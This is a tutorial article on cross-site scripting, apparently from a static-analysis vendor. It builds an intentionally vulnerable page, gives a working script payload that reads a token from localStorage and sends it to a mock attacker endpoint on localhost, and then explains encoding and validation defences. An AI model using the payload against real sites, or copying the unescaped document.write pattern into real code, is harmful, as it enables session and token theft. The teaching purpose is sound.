XSS - or cross-site scripting - is one of the most common vulnerabilities in web applications. It has been on the OWASP Top 10 list (the list of the most critical security risks to web applications) for a while now. So let's figure out together how your browser can acquire and execute a script from a third-party website, and what this may lead to (spoiler: your cookies could get stolen, for example). And while we're at it, we'll talk about ways you can protect yourself from XSS.
What is XSS?
Cross-site scripting (XSS) is a way to attack web systems. An intruder embeds malicious code into a web page. This code interacts with the intruder's server. The code is usually executed in a user's browser, as a web page is rendered, or, less frequently, after the user performs certain actions. Usually, everything an intruder needs you to do is to open a web page with the embedded malicious code - and the intruder can take advantage of the XSS vulnerability. This is one of the reasons why, as I am writing this article, XSS is number 7 on the 2017 OWASP Top 10 list (a list of the most dangerous vulnerabilities in web applications).
When rendering a web page, the browser cannot differentiate between plain text and HTML markup. That's why the browser, when rendering a web page, executes all JavaScript code inside the <script> tags. This peculiarity that browsers have is one of the main reasons why XSS attacks are possible.
To conduct an XSS attack, one needs to do the following:
embed malicious code that interacts with the intruder's web server, into a web page;
execute the embedded code as the page renders in the browser or as a user performs specific actions.
Now let's take a look at a sample XSS attack.
XSS attack example
Let's start at the beginning. How can one embed code into a web page? The first approach I can think of is to use the GET request parameters. Create a sample web page with the following logic:
if the GET request's xss parameter is empty, display the following message on the web page: Empty 'xss' parameter;
otherwise, show data from the xss parameter.
The page's code:
<!DOCTYPE html>
<html>
<head>
<meta charset="utf-8" />
<title>XSS Example</title>
</head>
<body>
<div style="text-align: center">Value of the 'xss' parameter: </div>
</body>
</html>
<script>
var urlParams = new URLSearchParams(window.location.search);
var xssParam = urlParams.get("xss");
var pageMessage = xssParam ? xssParam : "Empty 'xss' parameter";
document.write('<div style="text-align: center">'
+ pageMessage + '</div>');
</script>
Now check that everything works. Open the page with the xss parameter empty:
Assign the Not empty 'xss' parameter value to the xss parameter and open the page:
The page displays the strings correctly. And now to the interesting part! Pass the following string as the xss parameter: <script>alert("You've been hacked! This is an XSS attack!")</script>.
As you open the page, the code from the parameter is executed and you can see a dialog window with the text passed to the alert method:
Wow! The JavaScript code that you assigned to the xss parameter, was executed as the page was rendered. This way, you meet half of the first condition that an XSS attack requires: you've embedded code that is executed as the page is rendered. However, the code did not do any harm.
Now you can link the embedded code to an intruder's web server. In my example, a web service written in C# mimics this web server. The code of the web service's endpoint is as follows:
[ApiController]
[Route("{controller}")]
public class AttackerEndPointController : ControllerBase
{
[HttpGet]
public IActionResult Get([FromQuery] string stolenToken)
{
var resultFilePath = Path.Combine(Directory.GetCurrentDirectory(),
"StolenTokenResult.txt");
System.IO.File.WriteAllText(resultFilePath, stolenToken);
return Ok();
}
}
To access this web service, pass the following string as the xss parameter:
"<script>
var xmlHttp = new XMLHttpRequest();
xmlHttp.open('GET',
'https://localhost:44394/AttackerEndPoint?stolenToken=TEST_TOKEN',
true);
xmlHttp.send(null);
</script>"
As the browser loads the page, the code from the parameter is executed. The GET request is sent to the indicated web-service (https://localhost:44394/AttackerEndPoint) and the TEST_TOKEN string is passed as the stolenToken parameter. After getting the stolenToken parameter's value, the web service saves it to the StolenTokenResult.txt file.
You can test this behavior. Open the page. It displays nothing but the standard message - Value of the 'xss' parameter:.
However, in the developer tools, the 'Network' tab displays a message that a request to the https://localhost:44394/AttackerEndPoint web service has been sent:
Now check what's in the StolenTokenResult.txt file:
Okay, everything works. This way you've met nearly all XSS attack conditions:
some code is embedded into a web page through the GET request's xss parameter;
as the browser renders the page, this code is executed and interacts with a web service that has the following address https://localhost:44394/AttackerEndPoint.
All that's left is to make this code malicious. From the little experience I've had with web programming, I know that the browser sometimes stores user identification tokens for several websites or web applications. Here's how this works:
if a user's browser provides a required token from its local storage, the resource skips authentication and provides access to the user's account at once;
if the browser's local storage does not provide a token, the user has to be authenticated first.
To make the code executed on the page malicious, I decided to change the page's code. Now when the page is opened, the USER_VERY_SECRET_TOKEN string is saved to the browser's local storage. The data is accessible via the SECRET_TOKEN key. This is the modified page code:
<!DOCTYPE html>
<html>
....
</html>
<script>
localStorage.setItem("SECRET_TOKEN", "USER_VERY_SECRET_TOKEN");
....
</script>
Now all that's left is to pass the malicious code as the xss parameter in the GET request. The code gets access to data in the local storage and sends it to the web service. To do this, I'll pass a string as the parameter:
"<script>
var xmlHttp = new XMLHttpRequest();
var userSecretToken = localStorage.getItem('SECRET_TOKEN');
var fullUrl = 'https://localhost:44394/AttackerEndPoint?stolenToken='
%2b userSecretToken;
xmlHttp.open('GET', fullUrl, true);
xmlHttp.send(null);
</script>"
In URL, the '+' sign has a special role, so I used its encoded version instead: %2b.
Now you can check that everything works as expected. Open the web page:
Just as before, we can see only the one message in the middle of the page: Value of the 'xss' parameter:. Now check that the code was executed, and the web service got a request where the stolenToken value was equal to USER_VERY_SECRET_TOKEN:
Most users wouldn't have noticed the script's execution when opening the page, because the page does not indicate it in any way.
Make sure that the web-service got the stolen token:
Yes, it did! The stolenToken variable contains the USER_VERY_SECRET_DATA value. So, consequently, the web service stored it to the StolenTokenResult.txt file. Congratulations, your XSS attack was successful.
In this example, I passed malicious code to a request directly, as a request parameter. In real life, intruders mask links that contain malicious code (for example, they use an app that shortens links) and email them to a user (posing as a website's technical support manager or administrator) - or will publish it on a third-party website. Clicking on the masked link, a user opens a web page, thus starting a malicious script in a browser. Meanwhile, the user does not suspect anything. After the user executes the script, the attacker gets a token and can use to access the user's account. This way the attacker can steal confidential data and perform malicious actions on behalf of the user.
After looking into XSS attacks and how they occur, let's dive into theory a bit and discuss types of XSS attacks:
reflected XSS. A malicious script is embedded into a web page as text and is executed when a user opens the page in a browser;
stored XSS. These are similar to reflected XSS. The main difference is that data with the malicious script is saved somehow (for example, through a form's fields on a page, query parameters or an SQL injection) and stored in a storage (a database, a file, etc). Then data from the storage is added straight to the page that the user sees. HTML characters are not encoded. As a result, when a user opens the page, a malicious script is executed. This type of attack is especially dangerous because it potentially affects a group of users and not just one. For example, if a malicious script gets to a news page on a forum that anyone can view;
DOM-based XSS. This attack type involves a malicious script that is embedded into a web page's DOM model instead of the web page that is displayed to the user. For example, someone adds a malicious script into a button click event handler on a web page. The code is executed when a user clicks that button.
Considering the fact that this article's most likely reader is a developer, I should also talk about ways one can avoid making XSS vulnerabilities when writing code. Let's dive in.
Ways to prevent XSS vulnerabilities when developing
Since I am a C# developer, I'll review ways to secure your C# code against XSS attacks. However, discussing a particular language does not affect the general theory. Thus, the approaches I describe below apply to almost any programming language.
The first way you can secure your code from XSS vulnerabilities when developing is to use features of a web framework. For example, the ASP.NET C# framework, in .cshtml and .razor files, allows to mix HTML markup and C# code:
@page
@model ErrorModel
@{
ViewData["Title"] = "Error";
}
<h1 class="text-danger">Error.</h1>
<h2 class="text-danger">An error occurred while processing your request.</h2>
@if (Model.ShowRequestId)
{
<p>
<strong>Request ID:</strong> <code>@Model.RequestId</code>
</p>
}
This file displays the result of the Model.RequestId C# expression. For this file type to compile successfully, C# expressions or code blocks must start with the '@' character. However, this character does not simply allow to use C# along with the HTML markup in one file, but also directs ASP.NET to encode HTML characters into HTML entities if a code block or an expression returns a value. HTML entities are text fragments ("strings") that start with the ampersand character (&) and end with a semicolon (;). Entities are most often used to represent special characters (that can be perceived as part of HTML code) or invisible characters (such as a non-breaking space). This way ASP.NET helps developers avoid creating XSS vulnerabilities.
However, developers need to pay special attention to files with the .aspx extension in ASP.NET (an older version of files for HTML pages supporting C# code). This type of files does not automatically encode the results of C# expressions. To encode HTML characters returned by C# expressions in these files, place C# code in the <%: %> code block. For example:
<asp:Content ID="BodyContent" ContentPlaceHolderID="MainContent" runat="server">
....
<h2><%: Title.Substring(1);%>.</h2>
....
</asp:Content>
The second option is manually encoding HTML characters into HTML entities before displaying data on the web page. This way, special encoder functions are used. C# provides special methods to do this:
System.Web.HttpUtility.HtmlEncode(string);
System.Net.WebUtility.HtmlEncode(string);
System.Web.Security.AntiXss.HtmlEncode(string);
System.Text.Encodings.Web.HtmlEncoder.Default.Encode(string).
Since HTML symbols are encoded, the browser does not execute malicious code and just displays it on the web page. Encoded symbols are displayed correctly.
Let me demonstrate this security approach on the XSS attack we created earlier. There is one problem though: I could not find a function in Java Script that encodes HTML symbols into HTML entities. However, on the Internet, I found a way to write such a function quickly and easily:
function htmlEncode (str)
{
var div = document.createElement('div');
div.appendChild(document.createTextNode(str));
return div.innerHTML;
}
To write this function, I used the Element.innerHTML property's special features. You can use this function on the HTML page from the XSS attack example:
<!DOCTYPE html>
<html>
....
</html>
<script>
function htmlEncode(str)
{
var div = document.createElement('div');
div.appendChild(document.createTextNode(str));
return div.innerHTML;
}
var urlParams = new URLSearchParams(window.location.search);
var xssParam = urlParams.get("xss");
var pageMessage = xssParam ? xssParam : "Empty 'xss' parameter";
var encodedMessage = htmlEncode(pageMessage); //<=
document.write('<div style="text-align: center">'
+ encodedMessage + '</div>');
</script>
Here we encode the xss parameter value with the help of the htmlEncode function before the value is displayed on the web page.
Now let's open this page and pass the following string as the xss parameter: <script>alert("You've been hacked! This is an XSS attack!")</script>:
As you can see, when encoding a string that contains a script, the browser displays this string on the page and does not execute the script.
The third way to protect data is to validate data received from users or from an external source (an HTML request, a database, a file, etc). For such scenarios, a good approach is to use regular expressions. You can use them to catch data that contain dangerous characters or expressions. When the validator detects such data, the application displays a warning and does not send the data for further processing.
To read about other ways to protect yourself from XSS, click here. As you can see from the example above, even simplest web pages can have XSS vulnerabilities. Now imagine how many opportunities for XSS there are in projects that consist of tens of thousands lines of code. With this in mind, automated tools that search for XSS vulnerabilities have been developed. These utilities scan the source code or access points of websites or web applications - and produce a report about the vulnerabilities found.
Automated search of XSS vulnerabilities
If it so happened that you did not pay much attention to protecting your project from XSS, not everything is lost yet. To search web sites and web applications for vulnerabilities, many XSS scanners were developed. You can use them to find most known vulnerabilities in your projects (and not only in yours, because some scanners do not need access to source code). Such scanners can be free or paid. Of course, you can try to write your own XSS vulnerability detection tools, but they are likely to be less effective than paid tools.
The most logical and the cheapest way to look for vulnerabilities and fix them is to do this at early stages of development. XSS scanners and static code analyzers can help with this. For example, in the context of C# development, one of these static analyzers is PVS-Studio. PVS-Studio got the V5610 new diagnostic just recently. It looks for potential XSS vulnerabilities. You can also use both types of tools because each of them has its own area of responsibility. Thanks to these tools you can find existing vulnerabilities in your project, as well as possible future vulnerabilities.
If you are curious about the topic of vulnerabilities, and want to know more about detecting them with a static analysis tool, I recommend you to read the following article: OWASP, vulnerabilities, and taint analysis in PVS-Studio for C#. Stir, but don't shake.
Conclusion
XSS is an unusual and pretty nasty vulnerability in web security. In this article, I listed only one example of an XSS attack. In reality, there are many varieties of XSS attacks. Each project may have unique and well-known XSS vulnerabilities that intruders may exploit. To find vulnerabilities in a ready project, or if you do not have access to a project's source code, think about using XSS scanners. For preventing XSS vulnerabilities during development, use static code analyzers.
P.S. To get a little bit of experience with XSS (for educational purposes) I suggest you try this Google's game dedicated to XSS.